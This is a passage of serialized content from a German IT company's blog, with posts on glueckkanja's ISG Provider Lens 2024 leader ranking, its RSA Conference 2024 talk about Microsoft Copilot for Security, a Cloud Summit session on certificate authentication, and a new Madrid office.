langjähriger Microsoft-Partner unterstützt glueckkanja Unternehmen mit umfassenden Cloud-Lösungen. Der führende IT-Dienstleister versorgt über 1.000 Kunden weltweit mit seiner Expertise — die Erfahrung und Innovationsbereitschaft machen glueckkanja damit zu einem wertvollen Partner in der IT-Landschaft. Als solcher freuen wir uns, auch im Jahr 2024 von ISG Provider Lens™ zum Leader in unserem Geschäftsfeld ernannt worden zu sein.",[2548,9557,9559],{"id":9558},"die-isg-provider-lens-studie-2024","Die ISG Provider Lens™ Studie 2024",[353,9561,9352],{},[353,9563,9564],{},"Mit groß angelegten Studien unterstützt ISG Provider Lens™ Unternehmen in der Entscheidungsfindung für Positionierungs-, Beziehungs- und Go-to-Market-Überlegungen. Im Rahmen der Studie \"Microsoft Cloud Ecosystem\" werden die Leistungen der Anbieter auf Basis ihres Produktportfolios und ihrer Wettbewerbsfähigkeit in Bezug auf das Microsoft Cloud-Ökosystem bewertet.",[353,9566,9567],{},"Dabei teilt ISG die Anbieter auf Basis einer Bewertungsmatrix in vier Quadranten ein: Product Challenger, Contender, Market Challenger und Leader. Letztere verfügen über ein hoch attraktives Produkt- und Serviceangebot sowie eine ausgeprägt starke Markt- und Wettbewerbungsposition und sind damit Garant für Innovationskraft und Stabilität.",[353,9569,9570],{},"Als solch ein Leader wurde glueckkanja in vier Kategorien ausgezeichnet.",[2548,9572,9574],{"id":9573},"managed-services-for-azure-large-enterprises","Managed Services for Azure — Large Enterprises",[353,9576,9352],{},[353,9578,9579],{},[356,9580],{"alt":9581,"src":9582},"Managed Services for Azure - Large Enterprises","https://res.cloudinary.com/c4a8/image/upload/blog/pics/isg24-azure-large-enterprises.png",[353,9584,9585],{},"Im Bereich Managed Services for Azure hebt sich glueckkanja als Leader im Cloud-Management durch Fokus auf Automatisierung, Standardisierung und kontinuierliche Optimierung hervor. Der Einsatz von Infrastructure as Code (IaC) für die effektive Cloud-Strategierealisierung ist besonders erwähnenswert. Das Unternehmen hat sich laut ISG dabei als zukunftsorientierter Vorreiter im Bereich Microsoft Cloud Management präsentiert:",[367,9587,9588,9594,9605],{},[370,9589,9590,9593],{},[433,9591,9592],{},"Fokus auf Infrastructure as Code (IaC):"," glueckkanja nutzt Infrastructure as Code für die effiziente, schnelle und skalierbare Bereitstellung von Cloud-Infrastrukturen. Diese Methodik ermöglicht es, Infrastrukturen über automatisierbare Code-Skripte zu definieren und zu verwalten, was zu einer deutlichen Steigerung der Konsistenz und Qualität der Cloud-Dienste führt. Die Anwendung von IaC statt traditioneller Scripting-Methoden unterstreicht das moderne Verständnis von Cloud-Management.",[370,9595,9596,9599,9600,9604],{},[433,9597,9598],{},"Einbettung in Sicherheits- und Compliance-Standards:"," Das Engagement für hohe Sicherheits- und Compliance-Standards, u.a. ISO 27001, positioniert glueckkanja als vertrauenswürdigen Partner für Cloud-Dienste. Die Orientierung am ",[374,9601,9603],{"href":9602},"/de/azure/cloud-adoption-framework","Microsoft Cloud Adoption Framework"," und Well-Architected Framework bildet das Fundament für die Entwicklung und Optimierung kundenspezifischer Cloud-Strategien, wodurch ein umfassender Rahmen für die Einhaltung von Best Practices im Cloud-Management geschaffen wird.",[370,9606,9607,9610,9611,9615],{},[433,9608,9609],{},"Cloud Competence Center (CCC):"," Durch das Angebot des ",[374,9612,9614],{"href":9613},"/de/azure/cloud-competence-center","Cloud Competence Center"," betont glueckkanja die Bedeutung der kontinuierlichen Verbesserung und Anpassung an die Bedürfnisse von Organisationen. Das CCC dient als Beratungs- und Unterstützungsplattform für die Entwicklung von Cloud-Strategien und fördert eine Kultur der Innovation.",[2548,9617,9619],{"id":9618},"managed-services-for-azure-midmarket","Managed Services for Azure — Midmarket",[353,9621,9352],{},[353,9623,9624],{},[356,9625],{"alt":9626,"src":9627},"Managed Services for Azure - Midmarket","https://res.cloudinary.com/c4a8/image/upload/blog/pics/isg24-azure-midmarket.png",[353,9629,9630],{},"Als anerkannter und führender deutscher Anbieter von Managed Services auf der Azure-Plattform behauptet glueckkanja seine Spitzenposition auch dieses Jahr. Das Unternehmen bringt dabei Enterprise-Sicherheitsstandards in den Mittelstand ein und überzeugt durch schnelle, qualitativ hochwertige Cloud-Management-Lösungen:",[367,9632,9633,9639,9645],{},[370,9634,9635,9638],{},[433,9636,9637],{},"Verständnis für den Mittelstand:"," glueckkanja versteht die besonderen Herausforderungen und Bedürfnisse mittelständischer Unternehmen im Bereich Cloud Management. Durch den Einsatz von codebasiertem Deployment (IaC) wird eine schnelle und effiziente Bereitstellung von Cloud-Infrastrukturen ermöglicht, die speziell auf die Anforderungen und Ressourcen von Mittelständlern zugeschnitten sind. Diese Methodik unterstützt mittelständische Betriebe dabei, ihre IT-Infrastrukturen flexibel und kostengünstig zu skalieren.",[370,9640,9641,9644],{},[433,9642,9643],{},"Hochrangige Sicherheits- und Compliance- Standards:"," Gerade für den Mittelstand, wo Ressourcen begrenzt sein können, ist es entscheidend, einen Partner zu haben, der höchste Sicherheits- und Compliance-Anforderungen erfüllt. glueckkanja legt großen Wert auf die Einhaltung von Standards wie ISO 27001, orientiert sich an Rahmenwerken wie dem Microsoft Cloud Adoption Framework sowie dem Well-Architected Framework und geht sogar darüber hinaus.",[370,9646,9647,9650],{},[433,9648,9649],{},"Beratung und kontinuierliche Verbesserung:"," Mit dem Angebot des Cloud Competence Center (CCC) geht glueckkanja gezielt auf die Bedürfnisse mittelständischer Unternehmen ein. Das CCC bietet spezialisierte Beratung und Unterstützung bei der Entwicklung und Implementierung von Cloud-Strategien.",[2548,9652,9654],{"id":9653},"microsoft-365-services-large-enterprises","Microsoft 365 Services — Large Enterprises",[353,9656,9352],{},[353,9658,9659],{},[356,9660],{"alt":9661,"src":9662},"Microsoft 365 Services - Large Enterprises","https://res.cloudinary.com/c4a8/image/upload/blog/pics/isg24-m365-large-enterprises.png",[353,9664,9665],{},"glueckkanja überzeugt mit effizienten und sicheren Services, die die Digitalisierung in großen Unternehmen hoch standardisiert umsetzen und dabei individuelle Anforderungen an Compliance und Governance berücksichtigen. In diesem Zuge sagt leitender ISG-Analyst Axel Oppermann: \"glueckkanja hebt sich als führender Microsoft- Sicherheitspartner in Deutschland durch innovative IT-Lösungen hervor, die auf die Optimierung und Sicherung moderner Arbeitsplätze abzielen.\"",[367,9667,9668,9679,9689],{},[370,9669,9670,9673,9674,9678],{},[433,9671,9672],{},"Innovative Arbeitsplatzgestaltung:"," glueckkanja befähigt Anwender in ihrem Arbeitsalltag und in ihrer Arbeitsumgebung durch die Implementierung von ",[374,9675,9677],{"href":9676},"/de/workplace/managed-workplace/","Managed Workplaces",", die Microsoft 365 und Identity Services umfassend integrieren. Diese Dienstleistung ermöglicht eine ortsunabhängige Arbeit mit stets aktueller Software und Sicherheit. Die Bereitstellung erfolgt sowohl auf Windows- als auch auf Apple-Systemen.",[370,9680,9681,9684,9685,9688],{},[433,9682,9683],{},"Vollumfängliche Cloud-Sicherheit:"," glueckkanja bietet unter anderem durch die Nutzung von Entra ID auf Windows Enterprise Clients, geschützt durch Microsoft Defender Suite, eine umfassende Sicherheitslösung aus der Cloud. Die Integration von Autopilot in Microsoft Intune, ergänzt durch ",[374,9686,494],{"href":9687,"target":5319},"https://www.realmjoin.com",", optimiert IT-Aufgaben und steigert die Produktivität der IT-Abteilung.",[370,9690,9691,9694,9695,9699],{},[433,9692,9693],{},"Pionierrolle bei der Entwicklung des Windows 365 Cloud PC und der Integration mit M365:"," Eine zukunftsweisende Lösung bietet der ",[374,9696,9698],{"href":9697},"/de/workplace/windows365-cloud-pc/","Windows 365 Cloud PC",", der ein vollständiges Windows-Betriebssystem aus der Cloud, also M365 + Windows 365 aus einer Hand, bereitstellt. Diese Technologie ermöglicht eine schnelle Skalierung und eine sofortige Einsatzbereitschaft. glueckkanja war maßgeblich an der Entwicklung beteiligt und hat frühzeitig Erfahrungen in Kundenprojekten gesammelt, was die Rolle als innovativer Vorreiter unterstreicht.",[2548,9701,9703],{"id":9702},"microsoft-365-services-midmarket","Microsoft 365 Services — Midmarket",[353,9705,9352],{},[353,9707,9708],{},[356,9709],{"alt":9710,"src":9711},"Microsoft 365 Services - Midmarket","https://res.cloudinary.com/c4a8/image/upload/blog/pics/isg24-m365-midmarket.png",[353,9713,9714],{},"Mit Spezialisierung auf moderne Arbeitsplatzlösungen und Cloud-Infrastrukturen unterstützt glueckkanja mittelständische Unternehmen effektiv und sicher bei ihrer digitalen Transformation. Dabei erweist sich glueckkanja mit einem Angebot an hochsicheren und effizienten digitalen Arbeitsplatzlösungen für mittelständische Unternehmen als Spitzenreiter. Die Expertise in Managed Workplaces und innovative Integrationen setzen neue Standards:",[367,9716,9717,9723,9729],{},[370,9718,9719,9722],{},[433,9720,9721],{},"Vorreiter in Sachen Sicherheit und Digitalisierung:"," Als führende Kraft im Bereich der Microsoft-Sicherheit in Deutschland legt glueckkanja großen Wert darauf, den Nutzen und die Effizienz digitaler Arbeitsplätze mit M365 und darüber hinaus für seine Kunden zu maximieren. Durch umfassende Betreuung und standardisierte Lösungen, die speziell auf die Anforderungen mittelständischer Unternehmen abgestimmt sind, hebt sich das Unternehmen ab. Dabei stehen Sicherheit, Qualität und Schnelligkeit stets im Vordergrund.",[370,9724,9725,9728],{},[433,9726,9727],{},"Plattformübergreifende innovative Arbeitsplatzgestaltung:"," glueckkanja fördert eine moderne Arbeitsumgebung durch Managed Workplaces und die Integration von Microsoft 365 und Identity Services. Dies ermöglicht ein effizientes und sicheres Arbeiten auf Windows- und Apple-Systemen und erhöht die Flexibilität und Produktivität der Mitarbeitenden.",[370,9730,9731,9733],{},[433,9732,9693],{}," Eine zukunftsweisende Lösung bietet der Windows 365 Cloud PC, der ein vollständiges Windows-Betriebssystem aus der Cloud bereitstellt. Also M365 + Windows 365 aus einer Hand. Diese Technologie ermöglicht eine schnelle Skalierung und eine sofortige Einsatzbereitschaft. glueckkanja war maßgeblich an der Entwicklung beteiligt und hat frühzeitig Erfahrungen in Kundenprojekten gesammelt, was die Rolle als innovativer Vorreiter unterstreicht.",{"title":402,"searchDepth":403,"depth":403,"links":9735},[9736,9737,9738,9739,9740],{"id":9558,"depth":403,"text":9559},{"id":9573,"depth":403,"text":9574},{"id":9618,"depth":403,"text":9619},{"id":9653,"depth":403,"text":9654},{"id":9702,"depth":403,"text":9703},{"seoTitle":9742,"titleClass":7896,"date":9743,"categories":9744,"blogtitlepic":9745,"socialimg":9746,"customExcerpt":9747,"keywords":9748,"hreflang":9749,"contactInContent":9752,"scripts":9772},"ISG 2024: glueckkanja erneut Leader für Managed Services for Azure und Microsoft 365 Services","2024-04-24",[410],"head-isg-2024","/blog/heads/head-isg-2024.png","Zum wiederholten Male wird glueckkanja in der ISG-Studie als Branchenführer in den Bereichen "Managed Services for Azure" und "Microsoft 365 Services" bestätigt – für 2024 sowohl in der Kategorie Midmarket als auch Large Enterprises. Die Studie hebt dabei insbesondere die innovativen Lösungen des Unternehmens hervor, mit denen glueckkanja eine Vorreiterrolle für Kunden einnimmt.","glueckkanja, Microsoft Partner, Managed Cloud Services, IT-Dienstleister, Microsoft Cloud Ecosystem, Azure Services, Cloud Sicherheitslösungen, ISG Provider Lens 2024, Microsoft 365 Services, Cloud Competence Center",[9750],{"lang":2118,"href":9751},"/blog/corporate/2024/04/isg-en",{"quote":406,"infos":9753},{"headline":9754,"subline":9755,"level":2548,"textStyling":9489,"flush":9490,"person":9756,"form":9760},"Fordern Sie jetzt die Studie an","Haben Sie Fragen oder möchten tiefer in das Microsoft Cloud-Ökosystem eintauchen? Wir sind hier, um Ihnen zu helfen.",{"image":9757,"mail":9492,"number":9493,"cloudinary":415,"alt":9758,"name":9759,"detailsHeader":9496},"/people/people-pam-team.jpg","Project & Account Management","Wir freuen uns darauf, von euch zu hören!",{"ctaText":9508,"cta":9761,"method":407,"action":9511,"fields":9762},{"skin":9510},[9763,9764,9765,9766,9767,9769,9771],{"label":9514,"type":3722,"id":9515,"required":415,"requiredMsg":9516},{"label":9518,"type":3722,"id":9519,"required":415,"requiredMsg":9520},{"label":9522,"type":9523,"id":9523,"required":415,"requiredMsg":9524},{"label":9526,"type":9527,"id":9528,"required":415,"requiredMsg":9529},{"type":9531,"id":9532,"value":9768},"Anfrage ISG Studie",{"type":9531,"id":9535,"value":9770},"isg",{"type":9531,"id":9538},{"slick":415,"form":415},"/posts/2024-04-25-isg",{"title":9549,"description":9555},"posts/2024-04-25-isg",[3933,6430],"QAWlTp3rD-2Fj8Bs7_D-aKBcQaZFu2YfBXUdI8J8_uo",{"id":9779,"title":9780,"author":9781,"body":9782,"cta":3,"description":9786,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":9847,"moment":9849,"navigation":415,"path":9880,"seo":9881,"stem":9882,"tags":9883,"webcast":406,"__hash__":9885},"content_de/posts/2024-04-30-gk-at-rsac.md","glueckkanja @ RSA Conference",[191],{"type":350,"value":9783,"toc":9842},[9784,9787,9795,9799,9801,9809,9812,9816,9818,9821,9824,9830,9834,9836,9839],[353,9785,9786],{},"Seit 32 Jahren ist die RSA Conference ein wichtiger Treiber innerhalb der Cybersecurity Community. In einer Welt, in der die Gefahren von Attacken täglich steigen, hat sich die Messe zu einer Pflichtveranstaltung für alle entwickelt, die sich mit Sicherheit im Netz beschäftigen. Wie immer findet die renommierte Konferenz im sonnigen Kalifornien statt und glueckkanja ist natürlich auch wieder mit von der Partie.",[353,9788,9789,9790,9794],{},"Als Mitglied der ",[374,9791,9793],{"href":9792,"target":5319},"https://www.microsoft.com/de-de/security/business/intelligent-security-association","Microsoft Intelligent Security Association (MISA)",", einer Vereinigung wichtiger Sicherheitspartner von Microsoft, haben wir das gemeinsame Ziel, erstklassige Sicherheitslösungen zu entwickeln und Kunden vor Bedrohungen zu schützen.",[2548,9796,9798],{"id":9797},"ai-im-fokus-der-rsa-conference-2024","AI im Fokus der RSA Conference 2024",[353,9800,9352],{},[353,9802,9803,9804,9808],{},"Dieses Jahr setzt Microsoft den Fokus des ",[374,9805,9807],{"href":9806,"target":5319},"https://www.microsoft.com/en-us/security/blog/2024/04/04/explore-microsofts-ai-innovations-at-rsa-conference-2024","Konferenzprogramms"," voll auf den Copilot for Security, die neuartige AI-Lösung zur Unterstützung von Sicherheits- und IT-Experten bei der Identifizierung unerkannter Risiken.",[353,9810,9811],{},"Ein spannendes Thema in der aktuellen Diskussion, welches unser Security Lead, Jan Geisbauer, gerne aufgreift. In seiner Session am Microsoft Stand (07.05., 17:30 - 17:50 Uhr) stellt er während der RSA Conference die neue Technologie vor, zeigt ihre Möglichkeiten auf, weist aber auch auf aktuellen Grenzen hin. Die wichtigsten Punkte haben wir hier zusammengefasst.",[2548,9813,9815],{"id":9814},"microsoft-copilot-for-security-zur-erkennung-von-gefahren","Microsoft Copilot for Security zur Erkennung von Gefahren",[353,9817,9352],{},[353,9819,9820],{},"Lange Zeit stützte sich die Risikoerkennung auf die sogenannte 'Signature-Based Detection' – ein Verfahren, das Gefahren anhand bekannter Muster identifiziert. Da sich die Bedrohungslandschaft jedoch ständig weiterentwickelt und Angreifer ihre Methoden fortlaufend anpassen, bietet dieser Ansatz allein heute nicht mehr den erforderlichen Schutz. Der nächste Schritt in der Weiterentwicklung der Sicherheitstechnologie umfasst die Nutzung von Big Data zur Gefahrenerkennung. Moderne Softwarelösungen analysieren automatisch große Datensätze, um Muster und potenzielle Risiken zu identifizieren. Um dabei 'False Positives' effektiv zu reduzieren, ist allerdings die Expertise von geschultem Fachpersonal unerlässlich. Angesichts der immensen Datenmengen, die verarbeitet werden müssen, stellt dies hohe Anforderungen an die Ressourcen. Genau hier bietet der Microsoft Copilot for Security innovative Lösungen, die darauf abzielen, Sicherheitsteams zu unterstützen und den Schutz zu optimieren.",[353,9822,9823],{},"Neben Zusammenfassungen der wichtigsten Fakten von Datensicherheitsvorfällen mit Lösungsvorschlägen, kann Copilot for Security natürlich auch Prompts rund um das Thema Cybersecurity und die eigenen Systeme beantworten. Das Tool erledigt dabei auch komplexere Aufgaben, beispielsweise die Formulierung eigener KQL-Abfragen, um spezifische Sicherheitsdaten zu extrahieren. Eine überaus hilfreiche Funktion ist die Skriptanalyse, welche die Untersuchung von verdächtigen Skripten und Befehlszeilen massiv beschleunigt.",[353,9825,9826],{},[356,9827],{"alt":9828,"src":9829},"Ein Screenshot der Skriptanalyse Funktion des Copilot for Security von Microsoft","https://res.cloudinary.com/c4a8/image/upload/v1714461543/blog/pics/rsac-copilot-for-security-script-analysis.png",[2548,9831,9833],{"id":9832},"ergänzen-sie-ihr-system-mit-copilot-for-security","Ergänzen Sie Ihr System mit Copilot for Security",[353,9835,9352],{},[353,9837,9838],{},"Wie jedes Large Language Model (LLM) benötigt Copilot for Security noch das prüfende Auge von Expertinnen und Experten. Doch gerade bei der Analyse von rohen Daten stellt der Copilot for Security ein mächtiges Tool dar, dass es Kunden und Microsoft Security Service Providern (MSSP) erlaubt, schnellere und besser informierte Entscheidungen zu treffen.",[353,9840,9841],{},"Wir bei glueckkanja sehen es als unsere Aufgabe an, uns täglich zu verbessern, um neue und innovative Wege zu finden, unsere Kunden vor den wachsenden digitalen Gefahren des Alltags zu schützen. Daher empfehlen wir unseren Kunden, Copilot for Security in ihre Systeme zu integrieren und unterstützen gerne bei der Planung, Implementierung und der Nutzung des Tools.",{"title":402,"searchDepth":403,"depth":403,"links":9843},[9844,9845,9846],{"id":9797,"depth":403,"text":9798},{"id":9814,"depth":403,"text":9815},{"id":9832,"depth":403,"text":9833},{"seoTitle":9848,"titleClass":7896,"date":9849,"categories":9850,"blogtitlepic":9851,"socialimg":9852,"customExcerpt":9853,"keywords":9854,"contactInContent":9855,"hreflang":9874,"scripts":9879},"glueckkanja auf der RSA Conference 2024","2024-04-30",[1117],"head-rsa-conference-2024","/blog/heads/head-rsa-conference-2024.png","Wenn die RSA Conference vom 6. bis 9. Mai 2024 ihre Pforten öffnet, wird das glueckkanja Team rund um CEO Christian Kanja und Security Lead Jan Geisbauer auch wieder vor Ort sein. In diesem Jahr werfen wir einen genauen Blick auf den neuen Microsoft Copilot for Security.","glueckkanja, RSA Conference 2024, Microsoft Copilot for Security, Cybersecurity AI Solutions, MISA Awards, Security MSSP of the Year, Signature-Based Detection, Microsoft Intelligent Security Association, Big Data Security Analysis, Microsoft Security Service Provider, AI Cybersecurity Innovation, Script Analysis Tool",{"quote":415,"infos":9856},{"headline":9487,"subline":9857,"level":2548,"textStyling":9489,"flush":9490,"person":9858,"form":9863},"Sie haben noch Fragen? Wir helfen Ihnen gerne dabei, Ihr Unternehmen mit Microsoft Copilot for Security noch sicherer zu machen.",{"image":9327,"cloudinary":415,"alt":164,"name":164,"quotee":164,"quoteeTitle":9494,"quote":9859,"detailsHeader":9496,"details":9860},"Mit Copilot for Security arbeiten, heißt für Analysten, ein Exoskelett zu tragen. Es erweitert ihre Fähigkeiten und ihr Wissen massiv. Bei glueckkanja sind wir begeisterte Befürworter von Copilot for Security.",[9861,9862],{"text":9499,"href":9500,"details":9501,"icon":9502},{"text":9504,"href":9505,"icon":9506},{"ctaText":9508,"cta":9864,"method":407,"action":9511,"fields":9865},{"skin":9510},[9866,9867,9868,9869,9870,9872,9873],{"label":9514,"type":3722,"id":9515,"required":415,"requiredMsg":9516},{"label":9518,"type":3722,"id":9519,"required":415,"requiredMsg":9520},{"label":9522,"type":9523,"id":9523,"required":415,"requiredMsg":9524},{"label":9526,"type":9527,"id":9528,"required":415,"requiredMsg":9529},{"type":9531,"id":9532,"value":9871},"Anfrage Microsoft Copilot for Security Beratung",{"type":9531,"id":9535,"value":9536},{"type":9531,"id":9538},[9875,9877],{"lang":2118,"href":9876},"/blog/security/2024/04/gk-at-rsac-en",{"lang":9114,"href":9878},"/blog/security/2024/04/gk-at-rsac-es",{"slick":415,"form":415},"/posts/2024-04-30-gk-at-rsac",{"title":9780,"description":9786},"posts/2024-04-30-gk-at-rsac",[9884,9234,1117],"MISA","z5EcLvZ2J6oIsI_oZID0tmJ4_TmkTgfPyKaXlo4npTg",{"id":9887,"title":9888,"author":9889,"body":9890,"cta":3,"description":9894,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":9973,"moment":9975,"navigation":415,"path":9989,"seo":9990,"stem":9991,"tags":9992,"webcast":406,"__hash__":9995},"content_de/posts/2024-05-06-cloud-summit.md","glueckkanja @ Cloud Summit",[191],{"type":350,"value":9891,"toc":9969},[9892,9895,9898,9901,9905,9907,9910,9913,9927,9930,9934,9936,9939,9942,9945,9948,9960,9963],[353,9893,9894],{},"Heutzutage spricht jeder über künstliche Intelligenz. Diese neue Technologie ist längst keine futuristische Idee mehr, sondern ein Mittel, um die Effizienz und Kompetenz Ihres Unternehmens im täglichen Geschäftsbetrieb zu steigern – vorausgesetzt, sie wird richtig in die Infrastruktur der Organisation integriert.",[353,9896,9897],{},"Genau hier beginnen oft die Schwierigkeiten. Viele Unternehmen setzen weiterhin auf veraltete Technologien, und sogar das Faxgerät ist in Europa immer noch ein weit verbreitetes Kommunikationsmittel. 69% der Führungskräfte verfügen über keine klar definierte Cloud-Strategie und 51% der Organisationen versuchen immer noch, ihre On-Premises Umgebungen zu verstehen *.",[353,9899,9900],{},"Der Übergang zur Zukunft des Cloud-Managements scheint für viele Unternehmen eine große Herausforderung zu sein. Doch das muss nicht so sein.",[2548,9902,9904],{"id":9903},"glueckkanja-ist-ihr-techstack","glueckkanja ist Ihr TechStack",[353,9906,9352],{},[353,9908,9909],{},"Der erste Schritt zur Integration von Microsoft Copilot in Ihr Unternehmen ist die Erkenntnis, dass KI stark von großen Datenmengen abhängig ist. Damit diese Tools funktionieren, müssen Sie eine klare Strategie entwickeln, wie diese Daten beschafft, verarbeitet und genutzt werden. Dies muss effizient und vor allem sicher geschehen.",[353,9911,9912],{},"Bei glueckkanja sind wir auf Cloud-Management spezialisiert, mit einem Fokus auf Automatisierung, Standardisierung und kontinuierliche Optimierung. Um eine Cloud-Strategie effektiv umzusetzen, setzen wir stark auf den Einsatz von Infrastructure as Code (IaC). Als langjähriger Microsoft-Partner bieten wir umfassende Cloud-Lösungen in verschiedenen Bereichen an:",[367,9914,9915,9918,9921,9924],{},[370,9916,9917],{},"Workplace: Wir setzen den Standard für Geschwindigkeit, Sicherheit und Effizienz bei der Einführung von Microsoft 365 in jeder Größenordnung mit Managed Workplace-Lösungen sowie unseren Consulting Services",[370,9919,9920],{},"Azure: Von Null auf maximale Effizienz. Sichern, standardisieren und optimieren Sie Ihre Infrastruktur, Prozesse und Tools mit unserer Managed Azure und AVD Foundation",[370,9922,9923],{},"Sicherheit: In unserer vernetzten Welt muss Cybersicherheit oberste Priorität für Unternehmen haben. Als Europas führender MXDR-Partner für die Bereitstellung und Verwaltung von Defender und Sentinel helfen wir Ihnen, Ihre digitale Umgebung zu sichern",[370,9925,9926],{},"Produkte: Steigern Sie die Power Ihres Microsoft 365 mit unseren Cloud-nativen Companion-Produkten, die Zusammenarbeit, Softwaremanagement und Netzwerkauthentifizierung verbessern – wie unser RADIUSaaS, das hervorragend mit Microsoft Cloud PKI und anderen funktioniert",[353,9928,9929],{},"Möchten Sie mehr darüber erfahren, was wir für Sie tun können? Besuchen Sie uns auf dem Cloud Summit!",[2548,9931,9933],{"id":9932},"glueckkanja-auf-dem-european-cloud-summit-2024","glueckkanja auf dem European Cloud Summit 2024",[353,9935,9352],{},[353,9937,9938],{},"Vom 14. bis zum 16. Mai finden Sie uns am Stand 32-CD im RheinMain CongressCenter, wo der Cloud Summit stattfindet. Wir freuen uns auf viele spannende Gespräche mit allen, die an unserem Stand vorbeischauen.",[353,9940,9941],{},"Natürlich beteiligen wir uns auch mit einer Session von Dr. Christoph Hannebauer, Senior Developer bei glueckkanja, an der Diskussion auf der Bühne. Christoph wird Ihnen alles Wissenswerte über die Technologien SCEP und RADIUS erläutern und aufzeigen, wie sie zur Verbesserung der modernen Authentifizierung in Ihrem Unternehmen beitragen können. In Christophs Worten:",[353,9943,9944],{},"„Zertifikatsbasierte Authentifizierung (CBA) kann auch ohne Internetverbindung verwendet werden. Das macht sie zur idealen Wahl für die Netzwerkauthentifizierung. In meiner Session erkläre ich, wie man Zertifikate für moderne Arbeitsplätze registriert und CBA mit einer reinen Cloud-Zertifizierungsstelle (CA) und RADIUS verwaltet. Dies ermöglicht es Organisationen, sich von lokalen PKIs und NACs zu verabschieden und die Vorteile einer kosteneffektiven Cloud-Architektur zu nutzen.“",[353,9946,9947],{},"Verpassen Sie nicht die Session am Mittwoch, den 15. Mai 2024, um 12 Uhr und nutzen Sie die Gelegenheit, nach der Session mit Christoph und uns über Ihre verbleibenden Fragen und Gedanken zu sprechen.",[353,9949,9950,9951,9953,9955,9956,9959],{},"Kontaktieren Sie uns über ",[374,9952],{"href":9505},[374,9954,9504],{"href":9505}," oder bleiben Sie über ",[374,9957,4039],{"href":9958,"target":5319},"https://www.linkedin.com/company/glueckkanja"," auf dem Laufenden.",[353,9961,9962],{},"Wir freuen uns darauf, von Ihnen zu hören!",[353,9964,9965],{},[1847,9966,9968],{"id":9967},"fn1","* Quelle: „State of the Cloud“ Pluralsight-Studie Juni 2023",{"title":402,"searchDepth":403,"depth":403,"links":9970},[9971,9972],{"id":9903,"depth":403,"text":9904},{"id":9932,"depth":403,"text":9933},{"seoTitle":9974,"titleClass":7896,"date":9975,"categories":9976,"blogTitleImages":9977,"blogtitlepic":9981,"socialimg":9982,"customExcerpt":9983,"keywords":9984,"hreflang":9985,"scripts":9988},"glueckkanja auf dem Cloud Summit 2024","2024-05-06",[1773],[9978,9980],{"img":9979,"cloudinary":415},"/blog/heads/head-cloud-summit-2024.png",{"img":9979,"cloudinary":415},"head-cloud-summit-2024","/heads/head-cloud-summit-2024.png","Vom 14. bis 16. Mai findet in Wiesbaden, Deutschland, der European Cloud Summit statt. Es ist ein zentrales Treffen für alle, die im Bereich Cloud-Management tätig sind. Wir von glueckkanja freuen uns darauf, teilzunehmen, neue Ideen zu teilen und gute Gespräche zu führen. Besuchen Sie uns an unserem Stand oder nehmen Sie an einem aufschlussreichen Vortrag von Dr. Christoph Hannebauer teil.","glueckkanja Cloud Summit, European Cloud Summit 2024, cloud management experts, Infrastructure as Code (IaC), Microsoft Copilot integration, AI in cloud management, Microsoft 365 rollout, Managed Azure services, cybersecurity MXDR, cloud-based Microsoft solutions, cloud strategy development, network authentication solutions, cloud-native products, Cloud PKI, RADIUSaaS",[9986],{"lang":2118,"href":9987},"/blog/azure/2024/05/cloud-summit-en",{"slick":415,"form":415},"/posts/2024-05-06-cloud-summit",{"title":9888,"description":9894},"posts/2024-05-06-cloud-summit",[9993,9994,1773,3696,3631],"Flight Engineer","Cloud Management","7-OkzcRja83CrAtz2x8d3XBJIyCsylfW88J9hMWPpSc",{"id":9997,"title":9998,"author":9999,"body":10000,"cta":3,"description":402,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":10038,"moment":10040,"navigation":415,"path":10088,"seo":10089,"stem":10090,"tags":10091,"webcast":406,"__hash__":10093},"content_de/posts/2024-05-27-gk-in-spain.md","Viva España, Viva La felicidadkanja",[230],{"type":350,"value":10001,"toc":10034},[10002,10006,10008,10011,10022,10026,10028,10031],[2548,10003,10005],{"id":10004},"glueckkanja-startet-das-erste-office-in-spanien","glueckkanja startet das erste Office in Spanien",[353,10007,9352],{},[353,10009,10010],{},"Seit Anfang des Jahres sind wir nun auch in Madrid mit einem glueckkanja Office am Start: in der Calle de Goya 36, im Stadtteil Salamaca, nicht weit von Madrids wuseligem Zentrum entfernt. Von Spaniens Hauptstadt aus stellen wir Unternehmen auf der gesamten iberischen Halbinsel die geballte glueckkanja Expertise im Bereich Cybersecurity zur Verfügung.",[353,10012,10013,10014,2993,10017,10021],{},"Als einer der wichtigsten strategischen Microsoft Partner weltweit und als Partner von Microsoft Spanien bieten wir Security-Lösungen wie ",[374,10015,4707],{"href":10016},"/de/security/cloud-security-operations-center/",[374,10018,10020],{"href":10019},"/de/azure/azure-emergency-response-environment/","AzERE"," als individuell gebündelte Pakete an, die sich ohne Reibungsverluste in bestehende Prozesse integrieren lassen. Diese Strategie bietet nicht nur Komfort für unsere spanischen Kunden und schafft praktische Synergien in der Umsetzung, sondern ist in Spanien besonders vielversprechend: schließlich ist Spanien eines der weltweit am stärksten von Cyberangriffen betroffenen Länder.",[2548,10023,10025],{"id":10024},"german-engineering-mit-spanischer-leidenschaft","German Engineering mit spanischer Leidenschaft",[353,10027,9352],{},[353,10029,10030],{},"Unsere Arbeitsweise ist dabei genau so effizient (typisch deutsch!) wie einzigartig. Das Security Operations Center liefern wir direkt von unserem Team in Deutschland – unsere Analysen und die gesamte Beratung erfolgt mit einer großen Portion spanischer Leidenschaft und viel Verständnis für die Anforderungen des iberischen Marktes.",[353,10032,10033],{},"Besuchen Sie uns doch einfach mal in der Calle de Goya. Wir informieren Sie gerne persönlich über unser gesamtes Cyber-Portfolio. En espanol o en aleman – ganz wie Sie das wünschen!",{"title":402,"searchDepth":403,"depth":403,"links":10035},[10036,10037],{"id":10004,"depth":403,"text":10005},{"id":10024,"depth":403,"text":10025},{"seoTitle":10039,"titleClass":7896,"date":10040,"categories":10041,"blogTitleImages":10042,"blogtitlepic":10053,"socialimg":10054,"customExcerpt":10055,"keywords":10056,"contactInContent":10057,"hreflang":10082,"scripts":10087},"glueckkanja eröffnet erstes Büro in 